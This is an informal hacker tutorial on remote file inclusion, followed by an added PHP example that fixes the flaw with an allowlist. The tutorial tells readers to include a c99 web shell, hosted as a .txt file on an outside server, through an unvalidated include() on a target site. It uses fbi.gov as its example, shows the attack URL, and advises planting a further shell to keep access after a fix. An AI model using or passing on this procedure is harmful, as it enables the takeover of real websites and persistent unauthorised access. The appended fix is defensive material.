- ok so remote file inclusion is including a file from your site on another site/server
- normally people will include a c99 shell and there is 1 here http://www.evilc0der.com/c99.txt
- so then all you have to do is find a site
- so let's say we have a site
- http://www.fbi.gov/index.php?page=blog.php
- ok so to find if it's vulnerable go to index.php and view the source
- newbies "right click-->view page source"
- if the inclusion code is something like :
- Code:
- <?php
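- $page = $_GET['page']; // taken straight from the query string, no validation
- include($page); // includes whatever path or URL was supplied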
- ?>
- then it's possible to include our file on their site
- finding vuln sites is easier than ever now that google code search is out
- http://www.google.com/codesearch
- so let's say http://www.fbi.gov/index.php has that code in it
- now we try this
- http://www.fbi.gov/index.php?page=http:/...om/c99.txt
- you see this will show your c99 shell on their site
- so when it had the include function for blog.php it was including that page in that site.
- it's a common flaw, seeing that people use it so much because of its simplicity
- now this should work
- but if it shows the shell in its original text form
- then
- but don't try a .php shell on there
- because you see
- if you upload the shell to your account on let's say spam.com
- and save it as .php
- when you include the shell it will show the shell on your site
- so you will just be defacing your t35 account from a different site
- so it has to be in .txt form
- if it shows the shell I recommend uploading a shell from the included shell
- because it makes it much easier to manage
- also you can go back to the shell if they fix the bugs
- happy hacking
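The fix for the include code shown above, as an added example that is not part of the original paste: `page` is treated as a key into a fixed allowlist and is never used as a path or URL. The page names, the `pages/` directory and the function name `resolve_page` are assumptions made for illustration.

```php
<?php
// Added example (not from the original paste). File names are hypothetical.
// php.ini: allow_url_include = Off (the PHP default) already refuses
// http:// targets in include(); the allowlist below also stops local paths.

// Map of public keys to fixed local files. Nothing outside this map loads.
const PAGES = [
    'blog'    => 'blog.php',
    'contact' => 'contact.php', // hypothetical second page
];

function resolve_page($requested, string $baseDir): ?string
{
    // ?page[]=x arrives as an array; reject anything that is not a string.
    if (!is_string($requested)) {
        return null;
    }
    // Keys are short and alphanumeric, so ':', '/', '.' and NUL never pass.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    // Resolve symlinks and confirm the file still sits under the base dir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// index.php?page=blog now loads pages/blog.php; a URL or path in the
// parameter gets a 404 and is never passed to include.
$target = resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
include $target;
```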